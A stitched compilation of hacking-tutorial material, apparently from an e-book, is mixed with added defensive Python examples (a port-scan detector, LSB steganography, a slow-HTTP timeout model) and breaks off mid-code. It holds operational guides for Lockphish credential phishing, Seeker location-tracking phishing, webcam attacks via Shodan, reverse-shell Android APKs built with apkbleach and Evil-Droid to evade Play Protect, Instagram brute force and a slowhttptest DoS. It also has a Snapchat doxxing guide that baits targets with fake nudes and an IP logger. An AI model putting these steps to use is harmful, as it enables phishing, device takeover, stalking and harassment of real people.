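    attacker = Host("attacker", "203.0.113.5")
    zombie = Host("zombie", "192.0.2.50")
    target = Host("target", "192.0.2.80", open_ports={80, 443})
    print("zombie usable:", zombie_is_usable(attacker, zombie))
    for port in (80, 23):
        print("port %d: %s" % (port, idle_scan_port(attacker, zombie, target, port)))
    busy = Host("busy", "192.0.2.51", background=1)
    print("busy zombie usable:", zombie_is_usable(attacker, busy))
    print("port 80 via busy zombie:", idle_scan_port(attacker, busy, target, 80))
```

Note that target.sent only ever contains packets addressed to the zombie: the target's logs show the zombie as the scanner, which is the point of the technique.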

UDP SCANNING (-sU)

UDP port open:
o There is no three-way handshake for UDP, so there is nothing to complete.
o The system normally does not respond at all when the port is open (unless the probe happens to be a valid request for the service listening there), so Nmap reports such ports as open|filtered.
UDP port closed:
o If a UDP packet is sent to a closed port, the system responds with an ICMP Port Unreachable message (Type 3, Code 3).
o Spyware, Trojan horses, and other malicious applications often use UDP ports, which is why UDP scanning should not be skipped.
Because most systems rate-limit ICMP unreachable messages, UDP scans of many ports are slow.

SCANNING TOOL: NETSCANTOOLS PRO

NetScanTools Pro assists in troubleshooting, diagnosing, monitoring and discovering devices on the network. It lists IPv4/IPv6 addresses, hostnames, domain names, e-mail addresses and URLs, automatically or with manual tools.

PORT SCANNING COUNTERMEASURES

o Configure firewall and IDS rules to detect and block probes.
o Run port scanning tools against your own hosts to determine whether the firewall and IDS actually detect the scanning activity.
o Ensure that the routing and filtering mechanisms at routers and firewalls cannot be bypassed by using particular source ports (for example rules that trust anything coming from source port 53 or 20) or source-routing options.
o Keep router, IDS and firewall firmware updated to the latest releases.
o Use a custom rule set to lock down the network and block unwanted ports at the firewall (deny inbound by default).
o Filter the ICMP that scans rely on at firewalls and routers: inbound ICMP Echo Requests (ping sweeps) and outbound ICMP Type 3 unreachable messages (UDP scans). Do not drop ICMP wholesale: Type 3 Code 4 (Fragmentation Needed) is required for path MTU discovery, and blocking it breaks connections rather than protecting them.
o Perform TCP and UDP scans together with ICMP probes against your own address space to verify the network configuration and the ports it exposes.
o Ensure that anti-scanning and anti-spoofing rules (for example, drop inbound packets that claim an internal source address) are configured.
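The first countermeasure, detecting probes, is the kind of thing a firewall log plus a sliding window can do. The following Python script is an added example (not from the book) that reads iptables-style log lines, keeps a 60-second window per source address, and raises an alert when one source touches too many distinct ports on a host (a vertical port scan) or the same port on too many hosts (a horizontal sweep). The log lines are constructed for the example; the thresholds and the log layout are illustrative, and a real IDS such as Snort's sfPortscan preprocessor applies the same idea with more tuning.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# iptables-like log layout, constructed for this example: one line per logged SYN.
LOG_RE = re.compile(r"^(?P<ts>\S+) \S+ kernel: .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
                    r".*?PROTO=TCP .*?DPT=(?P<dpt>\d+)")

WINDOW = timedelta(seconds=60)   # sliding window per source address
PORT_THRESHOLD = 15              # distinct destination ports -> vertical port scan
HOST_THRESHOLD = 10              # distinct destination hosts -> horizontal sweep


def parse_line(line):
    """Return the fields a scan detector needs, or None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dpt": int(m["dpt"])}


def detect_scans(lines):
    """Return one alert per (source, kind) the first time a threshold is crossed."""
    recent = defaultdict(deque)      # src -> events inside the window, oldest first
    seen = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > WINDOW:     # expire events older than the window
            q.popleft()
        ports = {e["dpt"] for e in q}
        hosts = {e["dst"] for e in q}
        for kind, count, threshold in (("portscan", len(ports), PORT_THRESHOLD),
                                       ("sweep", len(hosts), HOST_THRESHOLD)):
            if count >= threshold and (ev["src"], kind) not in seen:
                seen.add((ev["src"], kind))
                alerts.append({"src": ev["src"], "kind": kind, "at": ev["ts"],
                               "distinct": count, "window_start": q[0]["ts"]})
    return alerts


def _fmt(ts, src, dst, dpt, spt=40000):
    return ("%s fw kernel: IN=eth0 OUT= SRC=%s DST=%s LEN=44 PROTO=TCP SPT=%d DPT=%d SYN"
            % (ts.isoformat(), src, dst, spt, dpt))


def sample_log():
    """Constructed firewall log: one normal client, one vertical scan, one sweep."""
    t0 = datetime(2024, 3, 1, 10, 0, 0)
    lines = []
    for i, dpt in enumerate((80, 443, 80, 443, 80)):                 # normal browsing
        lines.append(_fmt(t0 + timedelta(seconds=12 * i), "198.51.100.20", "192.0.2.10", dpt))
    for i in range(30):                                               # 30 ports in 30 s
        lines.append(_fmt(t0 + timedelta(seconds=i), "203.0.113.7", "192.0.2.10", 1 + i))
    for i in range(12):                                               # port 22 on 12 hosts
        lines.append(_fmt(t0 + timedelta(seconds=20 + i), "203.0.113.9",
                          "192.0.2.%d" % (20 + i), 22))
    return sorted(lines)                                              # chronological order


if __name__ == "__main__":
    for alert in detect_scans(sample_log()):
        print(alert)
```

Two design points matter in practice: alerting once per source and kind keeps a 65,535-port scan from producing 65,000 alerts, and a slow scan (Nmap -T0 style, one probe every few minutes) stays below any per-minute threshold, so long-window or cumulative counters are needed to catch it.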


SCANNING BEYOND IDS
IDS EVASION TECHNIQUES

o Use fragmented IP packets.
o Spoof your IP address when launching attacks and sniff the responses from the server (this only works when you can see the reply path, since replies go to the spoofed address, not to you).
o Use source routing (if the network still permits it; most routers drop source-routed packets).
o Launch attacks through proxy servers or a compromised, trojaned machine so that the IDS logs their addresses rather than yours.

SYN/FIN SCANNING USING IP FRAGMENTS (-f)

This is not a new scanning method but a modification of the earlier ones. The TCP header is split across several small IP fragments so that simple packet filters, which inspect only the first fragment, cannot see the TCP flags or port numbers and therefore cannot tell what the packets intend to do. Nmap does this with -f (8-byte fragments) or --mtu. It only defeats filters and IDSs that do not reassemble fragments before inspection, and most modern ones do.


HOW HACKERS HACK WEBCAMS USING ENTROPY AND SHODAN

Hacking webcams and cameras is one of the most searched hacking topics on the internet: cameras give away the most sensitive information, and with the right method attackers do compromise them, for example with the Entropy toolkit shown below. Our systems are always connected to the internet and few people use a camera cover, so negligence in computer security is a boon for anyone hacking webcams. Use a camera privacy cover, and never expose a camera's web interface directly to the internet: the cameras Shodan finds are exactly the ones whose web interface is reachable from outside. In this tutorial we show how hackers attack cameras and how you can protect yourself from such attacks.

HACKING WEBCAMS USING ENTROPY
Step 1: Download the Entropy toolkit on Kali Linux with the following command:
git clone https://github.com/entynetproject/entropy
Step 2: After downloading, change into the folder and give the installer execute permission, then run it:
cd entropy
chmod +x install.sh
./install.sh
Step 3: Now that it is installed, run the tool with the following command:
entropy

Step 4: Here is the list of all commands you can use in Entropy:


Step 5: To start attacking a camera we need some basic information, namely its IP address and port number, which can be found using Shodan.

Suppose the IP address and port are 192.168.1.100:80. The command is then:
entropy -b 1 -i 192.168.1.100:80 -v
This starts the attack against the camera at that address. Note that 192.168.1.100 is a private address, reachable only on your own LAN; addresses returned by Shodan are public ones.


If you want to attack multiple cameras, put the list of IP addresses and port numbers in a text file and pass it as shown in the following command:
entropy -b 2 -l iplist.txt -v
Here the file iplist.txt contains the list of camera IP addresses. You can also query the Shodan API directly with the following command; Entropy will then search Shodan for vulnerable cameras around the world:
entropy -b 2 -v --shodan
That's all, folks. This is how hackers attack webcams with the Entropy toolkit.


HOW TO HACK A WINDOWS LOCK SCREEN / ADMIN PASSWORD:
For this hack we use the Lockphish tool as part of a social engineering attack. We send the target a malicious link that opens a fake Windows lock screen and captures the password the target types into it.
Step 1: Clone Lockphish on your Kali Linux with the following command:
git clone https://github.com/JasonJerry/lockphish
Alternative clone URL if the one above does not work:
git clone https://github.com/jaykali/lockphish

Step 2: Now change directory to the lockphish folder:
cd lockphish
Step 3: Run Lockphish with the following command:
bash lockphish.sh

Step 4: Press Enter to use the default YouTube link, or provide the link you want the victim to be redirected to after entering the password, as shown below:

Step 5: Press Enter and the malicious link is created automatically, as shown below:


Step 6: Send this link to the victim. You can use a URL shortening service to make the URL look ordinary.
Step 7: The victim will see a lock screen like the one shown below:

Step 8: When the target enters the password, it is recorded as shown below:


In this hack, the malicious link we create loads, when opened, a web page that imitates the Windows login screen. The victim's PC is never actually locked: the page simply runs in the victim's browser, and whatever the victim types into its password field is sent to our Lockphish listener, as shown above. The victim believes Windows locked and that they unlocked it with their password, when in reality they typed that password into a phishing page, and we now have the victim's lock screen password. The attack therefore depends entirely on the victim trusting a browser page that looks like the lock screen; nothing on the victim's machine is exploited.


HOW HACKERS BYPASS GOOGLE PLAY SECURITY

Google Play Protect is Google's built-in malware scanner for Android. It is included by default on all recent Android phones that ship with the Google Play Store. Play Protect scans apps before and after installation and blocks or warns about any it identifies as harmful, which makes the phones considerably safer. When it detects malware it warns you as shown in the image below:

HOW TO BYPASS GOOGLE PLAY PROTECT WITH APKBLEACH
Step 1: Open Kali Linux and type the following command to clone the apkbleach tool onto your system:
git clone https://github.com/graylagx2/apkbleach

Step 2: After downloading, enter the apkbleach folder:
cd apkbleach
Now give the tool execute permission with the following command:
chmod +x apkbleach

Step 3: Run the apkbleach tool with the following command:
./apkbleach


Now I will build a malicious APK intended to get past Google Play Protect. The payload is a Metasploit Android Meterpreter reverse shell that connects back to 192.168.1.12 on port 4444 (replace these with your own listener address and port); -i sets the app icon and -o the output file:
./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /root/Desktop/service.apk

After entering the above command, we wait for the tool to build the malicious file.

Once the malicious file is built and sent to the target, we start a Metasploit handler (exploit/multi/handler with the same payload, LHOST and LPORT) and wait for the connection. As you can see in the image below, the malware file was not flagged by Google Play Protect.

And thus the payload was installed without Google Play Protect objecting. Note that this says nothing about detection by other scanners, and Play Protect's signatures are updated continuously, so a build that passes today may be flagged tomorrow; the target must also still allow installation from unknown sources and grant the permissions the app requests.


HOW TO FIND OUT THE EXACT LOCATION OF A PERSON USING SEEKER

The attack below works if the target opens the link on their mobile phone or desktop and allows location access. If location access is denied, the data we get is much less accurate (only what the browser and the public IP address reveal). With location access granted we can pinpoint the other person. With the Seeker tool we get the following information:
Device name and operating system
Device platform and browser name, version details, etc.
Number of processor cores and RAM capacity
Screen resolution and GPU information
The public IP address as well as other data

With location access you also get the exact location of the device and more.
HOW THE SEEKER TOOL WORKS
1. We create a phishing site that asks for location permission. You need social engineering and creativity for this one; an idea such as "find dating partners near you" gives the page a plausible reason to request the user's location.
2. To make it more convincing, we use a URL shortening service before sending the link to the target.
3. If the user grants the location permission, we learn their exact location.
REQUIREMENTS:

Kali Linux: the operating system used in this tutorial
Seeker: launches the phishing site and analyses the received data to find the exact location of the target
Ngrok: creates a public URL on the internet that tunnels to the local web server

If you do not have Kali Linux you can perform this hack on NetHunter or Termux as well; we have already shown how to install Termux and NetHunter on Android.
HOW TO INSTALL AND SET UP SEEKER IN KALI LINUX
Type the following commands to install the dependencies required to run Seeker:
sudo apt-get install python3 python3-pip php ssh git
pip3 install requests
Press Y when asked for confirmation and the dependencies will be downloaded and installed on your Kali Linux. Now install Seeker by cloning the tool:
git clone https://github.com/thewhiteh4t/seeker


Now switch to the seeker directory:
cd seeker
To see all the options that come with Seeker, type:
python3 ./seeker.py -h

INSTALLATION STEPS FOR NGROK IN KALI LINUX
You also need ngrok on your Kali Linux system in order to use Seeker from the internet. Download it with the following command:
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
(If this legacy URL no longer serves a file, download the current Linux build from your ngrok dashboard after signing up below.)

Now unzip the file:
unzip ngrok-stable-linux-amd64.zip

Now go to the ngrok website and complete the sign-up. You can log in with your Google or GitHub account if you prefer. A free account is enough: ngrok is free to use, with premium features if you are willing to pay.


After signing up you will see your auth token on the ngrok website, as shown in the image below. Now run the following command with your auth token:
./ngrok authtoken <your-auth-token>

The above command saves the auth token to your ngrok.yml file and prints the output shown below. Now give ngrok execute permission so that it can be run directly from the terminal:
chmod +x ./ngrok
To see all ngrok options, type:
./ngrok -h

SEEKER LOCATION TRACKING HACK
To start using Seeker type the following command:
python3 ./seeker.py -t manual
As seen in the image below, Seeker lists templates that you can use directly to track the location of your targets. I can see 4 templates; more may be added in the future.

For this hack I am choosing the NearYou template; we will show the rest in turn, don't worry. The following information is then displayed:
[+] Loading NearYou Template...
[+] Port : 8080
[+] Starting PHP Server...... [ Success ]
[+] Waiting for User Interaction.

Now you need to create a tunnel from the internet to the local server. In another terminal window, run ngrok with the following command:
./ngrok http 8080

Make sure to use 8080 and not 80 as suggested by ngrok: you need the port Seeker's PHP server is actually listening on. ngrok then prints a public link, something like:
https://10f34f608fb4.ngrok.io
This link must be sent to the target. You can use a service such as Bitly to shorten the URL and make it look like any other link. A desktop user will see the following:

The page looks decent and has animation. You can improve it further if you know how to code: edit the NearYou HTML file directly and add your own content. The text on the page claims that the service lets you find people near you and make new friends. If the user clicks the Continue button shown below, the browser shows the location permission request; if they accept it, you get their exact location:

The location data is received and a data file is generated containing all the location information. It works better on mobiles than on desktops, since a phone has GPS and therefore much higher accuracy (a desktop browser usually falls back to Wi-Fi or IP-based positioning). For convenience, a Google Maps link is also given which takes you straight to the target's location.


You can also use the Gdrive template, which makes the page look like a Google Drive page. The WhatsApp template works the same way. Since everyone uses WhatsApp, we show how to use the WhatsApp template for tracking a location, this time with the alternative method without ngrok, since we like to teach more than one way. Type the following command:
python3 ./seeker.py
Now select the WhatsApp template. A WhatsApp Serveo URL is generated, as shown below:

You need to provide a group name and the path of the image to use as the group icon. Refer to the image below:

Now when the target visits the WhatsApp link they see the following on their phone. Clicking the join option triggers the location request, which lets you track the exact location of the target just as in the first case.

The target's location data is then available as shown below:


HOW TO HIDE DATA FILES IN IMAGES USING STEGHIDE
HOW TO HIDE AND ENCRYPT FILES USING STEGANOGRAPHY IN KALI LINUX
Step 1: Open a Kali Linux terminal and install steghide. It is packaged in the Kali repositories, so there is no repository to clone:
sudo apt-get install steghide
Step 2: Download an image file in which we will hide the text file.
Step 3: In the terminal, change the working directory to Desktop with the following command:
cd Desktop
Step 4: Make sure that both files, the JPG image and the text file, are in the same working directory. In this tutorial the directory used is Desktop; you can choose any.

I have downloaded an image of a girl; the file is named girl.jpg. The text file is secret.txt.
Step 5: Type steghide or steghide -h to show all the options of steghide.
Step 6: Now type the following command to embed the text file into the image file, protected with a passphrase:

steghide embed -cf girl.jpg -ef secret.txt
Here -cf is the cover file and -ef the file to embed; without -sf the cover file itself is rewritten to carry the payload. The help output describes every option. Steghide encrypts the embedded data with the passphrase (Rijndael-128 in CBC mode by default) before hiding it, so the passphrase protects the content, not only its location.
Step 7: Steghide now prompts for a passphrase. Enter any passphrase you like, re-enter it to confirm, and press Enter. You will get the following output in your terminal.


Step 8: Voilà, you have successfully hidden the text file within the image.
HOW TO EXTRACT THE HIDDEN FILE USING KALI LINUX
Step 1: To extract the hidden file, go to your Kali Linux terminal and type the following command:
steghide extract -sf girl.jpg

Step 2: Now enter the passphrase. Without the correct passphrase steghide cannot decrypt the payload, and the file will not be extracted.
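To see what "hiding a file in an image" means at the byte level, here is an added example in Python (not from the book and not steghide's algorithm): it embeds a length-prefixed secret in the least significant bit of each byte of a cover buffer and extracts it again. The cover is a constructed byte string standing in for the raw pixel data of an uncompressed image (the pixel section of a BMP or PPM). Unlike steghide, which encrypts the payload and embeds it in JPEG DCT coefficients using a graph-theoretic scheme, this plain LSB method does no encryption and is easy to detect statistically; it is here to show the mechanism, not to replace the tool.

```python
def capacity(cover):
    """Bytes of secret that fit: one bit per cover byte, minus the 4-byte length prefix."""
    return len(cover) // 8 - 4


def embed(cover, secret):
    """Write the length-prefixed secret into the least significant bit of each cover byte."""
    if len(secret) > capacity(cover):
        raise ValueError("cover too small: %d bytes fit, %d given"
                         % (capacity(cover), len(secret)))
    payload = len(secret).to_bytes(4, "big") + secret
    out = bytearray(cover)
    for i, byte in enumerate(payload):
        for bit in range(8):                      # most significant bit first
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def _read(stego, start, count):
    """Reassemble `count` bytes from the LSBs starting at cover byte `start`."""
    data = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (stego[start + i * 8 + bit] & 1)
        data.append(value)
    return bytes(data)


def extract(stego):
    """Read the length prefix, then that many bytes, from the LSBs."""
    length = int.from_bytes(_read(stego, 0, 4), "big")
    if length > capacity(stego):
        raise ValueError("no valid payload: length prefix out of range")
    return _read(stego, 32, length)           # the prefix occupies the first 32 cover bytes


def max_change(cover, stego):
    """LSB embedding changes every sample by at most 1; a quick sanity check on an embed."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed stand-in for raw 8-bit image samples (4096 bytes).
COVER = bytes((i * 37) % 256 for i in range(4096))

if __name__ == "__main__":
    secret = b"this is the content of secret.txt\n"
    stego = embed(COVER, secret)
    print("capacity:", capacity(COVER), "bytes; max sample change:", max_change(COVER, stego))
    print("extracted:", extract(stego))
```

The reason a JPEG cannot be treated this way is visible in the code: it relies on every sample surviving unchanged except for its lowest bit, and lossy recompression rewrites all of them, which is why steghide works on the DCT coefficients instead and why re-saving a stego image through an image editor usually destroys the payload.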


HOW TO HACK ANDROID WITH EVIL-DROID
Step 1: To hack an Android app, first install the following dependencies:
metasploit-framework
xterm
zenity
aapt
apktool
zipalign

Step 2: Clone Evil-Droid from GitHub:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Step 3: Set the execute permission on the tool:
cd Evil-Droid
chmod +x evil-droid

Step 4: Now run the Evil-Droid framework with the following command:
./evil-droid

Step 5: Press 3 to inject the payload into an existing APK file.


Step 6: Set your local IP address (LHOST) as shown below:

Step 7: Set the port (LPORT); I use 4444, as shown in the image below. You can choose any port as long as it is not one already in use on your machine.

Step 8: Type the name for the output APK file.

Step 9: From the payload options select the one you wish to use. I am going to use android/meterpreter/reverse_tcp.

Step 10: Now select the APK you want to use, as shown below. I am going to use a random app just for kicks. This is the legitimate APK into which the malicious code will be injected.

Step 11: Once the file is selected, the tool starts building the infected app, as shown below.
Step 12: Now send the APK to the target. Once the target installs and opens the app, the payload connects back to your listener.

Step 13: After these steps complete you will get a reverse shell, as shown below:

Now you can use Meterpreter commands to control the device. Note that the target must have allowed installation from unknown sources, the app must be running for the session to stay up, and LHOST must be reachable from the phone: a private LAN address only works while the phone is on your network, otherwise you need a public IP or a tunnel such as ngrok.


HOW TO CRACK A WINDOWS 10 PASSWORD WITH OPHCRACK

This is a process that goes through several stages to recover the password of a Windows account. The method applies when you have forgotten the password of a local account on a machine you own, and here we describe the Ophcrack software that helps with it. Ophcrack boots from a live CD/USB, reads the password hashes from the SAM database on disk, and looks them up in precomputed rainbow tables; you just need to download the Ophcrack ISO file and write it to a CD/USB. Now step through the method in detail.
Step 1: To begin, you need access to another computer to download the Ophcrack ISO from the official Ophcrack site, linked below. Download

Step 2: On the home page you will see several download options; select 'Ophcrack LiveCD'.
Step 3: After downloading the Ophcrack LiveCD, use a tool such as Rufus to write the ISO to a USB drive.

Step 4: Writing the ISO to the USB drive takes three actions: insert the USB drive, select the ISO file in the tool, and click the 'Start' (or 'Burn') button.

Step 5: When writing is complete, eject the bootable USB drive and insert it into the locked computer. Set the USB drive as the first boot device in the BIOS/UEFI settings (on UEFI machines Secure Boot may need to be disabled for the live system to boot).
Step 6: Now restart the computer; the Ophcrack LiveCD menu appears with four options. Choose the default, 'Ophcrack Graphic mode - automatic'.

Step 7: Ophcrack loads the local user accounts and, once the table lookup finishes, lists the accounts together with the passwords it recovered.
Step 8: The password appears in the 'NT Pwd' column; note it down. If the column stays empty, the password lies outside the coverage of the free tables (which cover short, simple passwords only). Ophcrack also cannot read the hashes at all if the disk is protected by BitLocker.

Step 9: Remove the bootable USB drive and restart the computer.
Step 10: Use the password recovered with the Ophcrack LiveCD to log in to Windows 10.
Step 11: That is it; you can now use Windows 10 as before.


HOW TO PERFORM A "SLOW HTTP" DOS ATTACK WITH SLOWHTTPTEST

Most web administrators who do not properly care about the security of their servers are frequent targets of attacks that many black-hat hackers know how to perform en masse. One of those tricky attacks is the slow HTTP attack, which targets any kind of web server. Let's explain quickly and graphically what the attack looks like:

It's just, pretty simple right? However for a bad configured server this can be the doom, the hardware won't be pushed up to the limits, however it hangs basically for education ... (bad example i know). Didn't get it ? Imagine sending 100 old grandmas to a store, with all of them trying to tell a story from their childhood to the cashier so that no other customers can buy anything. For education, the cashier won't kick the grandmas out of the store until they end up telling the story. So, how you can perform such attack easily to a server and don't die trying ? The SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP connections in different ways. Use it to test your web server for DoS vulnerabilites, or just to figure out how many concurrent connections it can handle. SlowHTTPTest works on majority of Linux platforms, OS X and Cygwin - a Unix-like environment and command-line interface for Microsoft Windows, and comes with a Dockerfile to make things even easier. Currently, the supported attacks by the slowhttptest library are:    

Slowloris Slow HTTP POST Apache Range Header Slow Read

In this article, we'll teach you how to install slowhttptest on your Kali Linux system and how to use it to perform this attack on your servers. 1. INSTALL SLOWHTTPTEST The Slowhttptest library is available from the repositories, so you can easily install it from the command line with the following command: # update repos first sudo apt-get update

62 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER # Install the tool sudo apt-get install slowhttptest For more information about this tool, please visit the official repository at Github here. 2. RUNNING TEST Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server. Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly. The command to run the attack to check if the server is the following one: slowhttptest -c 500 -H -g -o ./output_file -i 10 -r 200 -t GET -u http://yourwebsite-or-server-ip.com -x 24 -p 2 The command is described as next:          

-c: Specifies the target number of connections to establish during the test (in this example 500, normally with 200 should be enough to hang a server that doesn't have protection against this attack). -H: Starts slowhttptest in SlowLoris mode, sending unfinished HTTP requests. -g: Forces slowhttptest to generate CSV and HTML files when test finishes with timestamp in filename. -o: Specifies custom file name, effective with -g. -i: Specifies the interval between follow up data for slowrois and Slow POST tests (in seconds). -r: Specifies the connection rate (per second). -t: Specifies the verb to use in HTTP request (POST, GET etc). -u: Specifies the URL or IP of the server that you want to attack. -x: Starts slowhttptest in Slow Read mode, reading HTTP responses slowly. -p: Specifies the interval to wait for HTTP response onprobe connection, before marking the server as DoSed (in seconds).
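The "protection against this kind of attacks" mentioned later in this section is, on the server side, a bounded and rate-aware read timeout on the request headers. The following is an added example, not code from the page or from the slowhttptest project: it models in Python the semantics of an Apache `RequestReadTimeout header=20-40,MinRate=500` style policy (the analogue is my assumption) so that you can see why the client in the command above, which trickles a few bytes of follow-up data every `-i 10` seconds, is dropped while an ordinary browser is not. All timings and byte counts are constructed sample values.

```python
"""Rate-aware request-header read timeout, modelled in Python (added example).

Mirrors the semantics of Apache's `RequestReadTimeout header=20-40,MinRate=500`
(an assumed analogue, not code from mod_reqtimeout): the server grants 20 s for
the request headers, extends the deadline by one second for every 500 bytes
that arrive, and never waits longer than 40 s after accept(). The client
traffic patterns below are constructed sample values.
"""
from dataclasses import dataclass, field
from typing import Iterable, Optional, Tuple


@dataclass
class HeaderTimeoutPolicy:
    initial_timeout: float = 20.0   # seconds granted before any header byte arrives
    max_timeout: float = 40.0       # absolute cap, measured from accept()
    min_rate: float = 500.0         # bytes per second that keep the deadline moving


@dataclass
class Connection:
    """The per-connection bookkeeping a server keeps while reading headers."""
    opened_at: float
    policy: HeaderTimeoutPolicy
    deadline: float = field(init=False)
    received: int = 0
    headers_complete: bool = False

    def __post_init__(self) -> None:
        self.deadline = self.opened_at + self.policy.initial_timeout

    def on_data(self, now: float, nbytes: int, ends_headers: bool) -> bool:
        """Account for nbytes arriving at time `now`.

        Returns False if the deadline had already passed, meaning the server
        closed the socket before these bytes were ever read.
        """
        if now > self.deadline:
            return False
        self.received += nbytes
        # Every byte buys 1/min_rate seconds of extra time, up to the hard cap.
        self.deadline = min(self.deadline + nbytes / self.policy.min_rate,
                            self.opened_at + self.policy.max_timeout)
        if ends_headers:
            self.headers_complete = True
        return True


Event = Tuple[float, int, bool]   # (seconds since accept, bytes sent, ends the headers?)


def simulate(events: Iterable[Event], policy: Optional[HeaderTimeoutPolicy] = None) -> dict:
    """Replay one client's send pattern; report whether its headers were accepted."""
    conn = Connection(opened_at=0.0, policy=policy or HeaderTimeoutPolicy())
    for when, nbytes, ends in events:
        if not conn.on_data(when, nbytes, ends):
            break
        if conn.headers_complete:
            return {"accepted": True, "closed_at": None, "bytes": conn.received}
    # Either a chunk arrived after the deadline or the client simply stalled:
    # the server tears the connection down at the deadline.
    return {"accepted": False, "closed_at": conn.deadline, "bytes": conn.received}


# Constructed traffic. A browser sends its ~300 bytes of headers in one go...
BROWSER = [(0.05, 300, True)]
# ...while a slowloris-style client trickles 4 bytes of header every 10 s (the
# `-i 10` interval from the command above) and never terminates the headers.
SLOW_CLIENT = [(float(t), 4, False) for t in range(0, 120, 10)]

if __name__ == "__main__":
    print("browser    :", simulate(BROWSER))
    print("slow client:", simulate(SLOW_CLIENT))
```

With this policy a pool of 500 slow connections costs the server at most 40 seconds of socket time each instead of an open-ended wait, which is why the tool's probe keeps reporting the service as available. Slow Read attacks the write side instead, so they need the corresponding send timeout or minimum drain rate, which this model does not cover.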

Now if we run the command with the target server, we get a similar output in the terminal:

As you can see, our target is our own website; however, even with 500 connections our server doesn't hang at all, because we do have protection against this kind of attack. The "service available" field will always say YES if the target is reachable. You can check from another computer or network whether the website is really still up. The HTML output generated by our options looks like this:

But what if we disable the protection against Slow HTTP attacks on our server? The output should then be different, and the website on the target server won't be reachable:

Don't always trust the "service available" message; try accessing the real website from a browser and you will see whether it works or not. The generated output is different this time because the website is unreachable:


HOW TO HIDE DATA IN AN AUDIO FILE

We have already covered a method for hiding files in a picture; this time we will show a method for hiding data in audio files.

LET'S GET STARTED:

1. Download and install DeepSound: http://jpinsoft.net/DeepSound/Download.aspx
2. Open the program and click "Open carrier files", then specify the path of the audio file in which the information will be hidden.
3. Click "Add secret files" and select the data you want to hide.
4. Click "Encode secret files". The files are now hidden in the "music".
5. To get them out again, add the audio file containing the encoded data on the main page of the program and click "Extract secret files".

Done! Now you know another method for storing important information securely. Bear in mind that hiding is not the same as protecting: anyone who suspects the carrier holds data can feed it to the same tool, so encrypt sensitive files before embedding them.

HOW TO DOX SOMEONE USING SNAPCHAT

Doxing, or doxxing, is the Internet-based practice of researching and publicly broadcasting private or identifying information about an individual or organization. The methods employed to acquire this information include searching publicly available databases and social media websites, hacking, and social engineering. This will work best if you already have your target's Snapchat; you may be able to get it with the info you already have.

STEP 1: Create a Snapchat with a female name (emily18x) and make a Bitmoji for the account.
STEP 2: Score your Snapchat score to make it look like a legit account. You can spam pictures to random accounts like @abc @1234, but it's easier to spend $1 on a Snapchat score boosting service. You can find that here: discord.gg/cxWwETYBnK (by @alexender).
STEP 3: Create an empty Google Drive folder, call it "nude previews" and set the shareable link to "Anyone with link".
STEP 4: Go to grabify.link and put in your Drive link > click on make custom link/change domain (green button) > change it to imageshare.best.
STEP 5: Add your target on Snapchat if you do not have him already and start talking in a flirty way.
STEP 6: He will start talking about nudes at some point. You say "I have some nudes in my drive ;)" then send the link right away. Then he will say it's empty. Tell him "ohh my bad wrong folder!" and send the link you make in the following steps.
STEP 7: Now you got his IP address, you can see which phone he uses, etc.
STEP 8: Create a new folder also called nude previews and set the shareable link to "restricted" (standard settings).
STEP 9: Send that link; he will need to request access, and if he does that you got his email in your email inbox.

====EXTRA STEPS====

STEP 10: If he uses his face in the profile picture of his email, get a full size version of it using this tutorial: www.youtube.com/watch?v=ir0-uSL80RA&t
STEP 11: Simply google his Gmail account without the @gmail.com and, if he uses his name, obviously go to Instagram/Facebook and search him.

If they don't click on your links just ignore them for 5 minutes, their dick will click on it.


HOW TO HACK INSTAGRAM ACCOUNT [BRUTEFORCE]

NOTE: Don't expect that you can hack whatever account you want! This is just a demonstration of how it works! For it to work fully you need a deeper understanding of it. This is just a brute-force attack, so don't expect results all the time.

So the first thing you need is Kali Linux, Parrot Sec OS or any other Linux OS. You can download Parrot OS from https://parrotsec.org and Kali Linux from kali.org. Now let's start the guide.

1. The first thing you need is a net connection and a brain, and yeah, don't forget Linux, any distro or flavor.
2. For the purpose of this tutorial I am going to use the brute-force technique.
3. Brute force is the technique of trying many passwords against a single user from a predefined character set; more specifically, I am going to talk about a dictionary attack. [A dictionary attack is an attack in which the candidate passwords are saved in a file, from which we try them against a single user.]

OK, so let's start and run the following commands. Open a terminal:

apt update && apt upgrade -y
apt-get install git
apt-get install python
apt-get install python3
cd Desktop                                       {change directory to Desktop}
git clone https://github.com/Pure-L0G1C/Instagram   {clone the GitHub repo}
chmod +x Instagram
cd Instagram
python instagram.py -h                           {show the help menu}

Now simply enter this command (with python, python2 or python3, depending on your system):

python instagram.py USERNAME_OF_VICTIM /path/to/wordlist_file

[Wordlist files come by default in Kali or Parrot: just extract rockyou from /usr/share/wordlists, or use your own wordlist and replace the path.] If the user's password is in rockyou this will work; if not, it's your bad luck, but you can try other ways if you want.
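From the defender's side, a dictionary attack like the one described above leaves a very recognisable trace: many failed logins for one account from one source in a short window, sometimes followed by a success. The following is an added example, not part of the page or of the tool it describes: it runs a sliding-window counter over constructed authentication log lines and flags the source/account pairs that should trigger a lockout, a CAPTCHA or an analyst alert. The log format, field names and thresholds are assumptions.

```python
"""Sliding-window detector for online password guessing (added example).

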